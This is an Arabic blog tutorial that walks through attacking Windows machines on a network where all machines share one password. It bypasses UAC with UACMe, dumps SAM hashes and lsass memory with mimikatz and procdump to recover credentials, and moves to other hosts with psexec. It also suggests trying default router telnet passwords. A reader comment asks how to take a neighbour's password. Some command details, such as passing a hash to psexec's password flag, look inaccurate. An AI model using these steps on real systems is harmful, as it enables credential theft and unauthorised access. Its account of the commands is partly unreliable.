أدوات وبرامجأمن وحماية الشبكاتالمقال المثبتمواضيع عامةمواضيع ومقالات

اختراق اكثر من جهاز له نفس الباسورد داخل الشبكه (Pass-the-hash)

تم أرشفة هذا المحتوى


الكثير من الهجمات التي من الممكن تنفيذها على الشبكات والانظمه قد لا تكون سببها ثغرات فقط ,  الاعدادات الخاطئه او الغير جيده للشبكه والاجهزة تتسبب في العديد من المشاكل التقنيه والامنيه .

في هذا المقال سوف ناخذ مثال على Misconfiguration attacks وهو ببساطه عباره عن مهاجمه اجهزه لم يقم مدير الشبكه باعدادها جيدا لتراعي الجوانب الامنيه .

في هذا السيناريو سوف نفترض بأن هناك مدير شبكه قام باعداد الشبكه ولم يقوم بوضع كلمه سر مختلفه لكل جهاز على الشبكه قد  تكون شبكه موظفين في شركه او جامعه او كافي نت . احيانا تكون هذا الاخطاء بسبب قلة وعي مدير الشبكه او بسبب الكسل والاهمال بوضع باسورد مختلف لكل جهاز , احيانا ايضا الكلفه فبعض الشبكات الصغيره والتي قد لا تكون في بيئة الدومين او لا تتواحد منتجات تقوم بعمل centralization  وتحكم كامل بالشبكه .

في البداية سوف نحاول ايجاد كلمه السر الخاصه بالجهاز الذي استطعنا الوصول اليه واختراقه او الجهاز الذي نستخدمه في حاله كان لنا وصول للشبكه . سوف نستخدم الاداه الشهيره mimikatz في هذا الحالة

لتحميل الأداه من هنا

https://github.com/gentilkiwi/mimikatz/releases

ولكن هناك مشكله وهي تتمثل في  User Account Control) UAC)

الـUAC هو المسئول عن مراقبه صلاحيات المستخدمين علي أنظمه الويندوز والمشكله هنا هي أنه لكي نستطيع أستخدام أداه mimikatz يجب أن نقوم بتشغيلها بصلاحيات مسئول

ولذلك يجب أن نقوم بعمل تخطي لصلاحيات المستخدم ولعمل هذا هناك الكثير من الخدع لكن هناك أداه شهيره بها 23 طريقه لعمل تخطي لصلاحيات المستخدم لمختلف أصدارات الويندوز وهي أداه UACMe

لتحميلها قم بزياره الرابط الأتي وأختار النسخه المناسبه لجهازك

https://github.com/hfiref0x/UACME/tree/master/Compiled

وأختار الطريقه المناسبه من هنا

https://github.com/hfiref0x/UACME/blob/master/README.md#usage

أنا فضلت أختيار الطريقه 3 لأنها كما هو مكتوب تعمل بدايه من ويندوز 7 حتي 10 ولأستخدام الأداه تقوم بالأمر الأتي بعد تنزيلها

Akagi64.exe 3

لاحظ أنني أستخدمت Akagi64.exe بدلا عن Akagi32.exe وذلك لأن جهازي 64 بت

cmd

كما تلاحظ فالأن أمامنا الـcmd بصلاحيات مسئول 😀

والأن الخطوه التاليه نفتح أداه mimikatz بصلاحيات مسئول ونقوم بكتابه الأوامر الأتيه بها

privilege::debug
token::whoami
token::elevate
lsadump::sam

mimi

والأن كما تلاحظ فقد حصلنا علي كلمه سر المستخدم لكنها في صوره هاش ولكن ليست مشكله فنحن سنقوم بهجوم Pass-The-Hash للدخول علي الأجهزه الأخري وبالتالي لن نحتاج الي كلمه السر الأصليه 🙂

ولكن أذا أردت كلمه السر الأصليه يمكنك تطبيق طريقه أخرى من طرق الأداه لتجاوز صلاحيات المستخدم أو نستخدم طريقه أخرى لجلب كلمات السر وهي بمساعده أداه procdump , نقوم  اولا بعمل dump لبروسيس lsass.exe والذي ستجده دائما يحتوي علي كلمات السر في صوره نصيه وتكون الطريقه كالأتي

بعد تنزيل procdump من الرابط :

https://technet.microsoft.com/en-us/sysinternals/dd996900.aspx

تقوم بتنفيذ الأمر الأتي

procdump64.exe -accepteula -ma lsass.exe MyDump.dmp

وبعدها نفتح أداه mimikatz ونقوم بكتابه الأوامر الأتيه لنستخرج كلمات السر من ملف MyDump.dmp

sekurlsa::minidump MyDump.dmp 
sekurlsa::logonPasswords

والأن أنتهي من جلب كلمه السر فيقوم الأن بالدخول علي الأجهزه الأخري عن طريق أداه psexec ولتحميلها أدخل علي الرابط التالي

https://technet.microsoft.com/en-us/sysinternals/pxexec.aspx

وسوف نقوم باختيار الجهاز المراد من ناتج أمر Net View ايضا يمكنك معرفه اسم الجهاز عن طريق اداة nmap

استخدام الامر

netdiscover -r 192.168.1.0

 

الأن نستخدم الأداه من الأمر الأتي

psexec \\hostname -u Administrator -p {Password_Hash} cmd.exe

والأن استطعنا الوصول الى الجهاز الهدف و وتستطيع أستبدال cmd.exe بأي بروسيس أخر تريد تشغيله

أيضا يمكننا اذا حالفنا الحظ بالدخول علي الروتر الخاص بالشبكه  من خلال خدمه التيلنيت باستخدام كلمه السر الافتراضيه , يمكنك ايضا فحص الشبكه بالكامل والبحث عن اي جهاز ترك باعداداته الافتراضيه ومحاولة استغلاله .

ملاحظه : هذا النوع من الهجمات منتشر جدا في العديد من الشبكات خاصة العامه منها مثل الفنادق والمقاهي وشبكات الجامعات .

 

Karim Shoair

كريم, عمري 21 سنه, هاكر أخلاقي ومطور أجيد العديد من اللغات وأكثرهم أستخداما هى البايثون ومهتم بالعديد من المجالات المتعلقه بالحمايه وعلوم الكومبيوتر بشكل عام. لي العديد من الأدوات المعروفه مثل Dr0p1t ,QRLJacker ,Cr3dOv3r , One-Lin3r و PasteJacker فأنا أحب برمجه أدوات أختبار الأختراق وأكتشاف الثغرات الأمنيه بشكل عام وما الى ذلك.

مقالات ذات صلة

‫7 تعليقات

  1. لو سمحت يا كريم عاوز اجهز نظام كالى لينكس على نظام وهمى virtualbox
    ازاى اجهز البرنامج عشان انزل لينكس عليه
    وياريت نسخه كويسه من البرنامج والنسخه وطريقه التثبيت

  2. اما مفهمتش ده انا بجيب الUser b والبسورد بتوعي وبدخل ع جهازي ازاي اجيب كلمه سر جهاز شخص معايه علي الشبكه وادخلي علي جهازه من الادمن او اليوزر

اترك تعليقاً

لن يتم نشر عنوان بريدك الإلكتروني. الحقول الإلزامية مشار إليها بـ *

زر الذهاب إلى الأعلى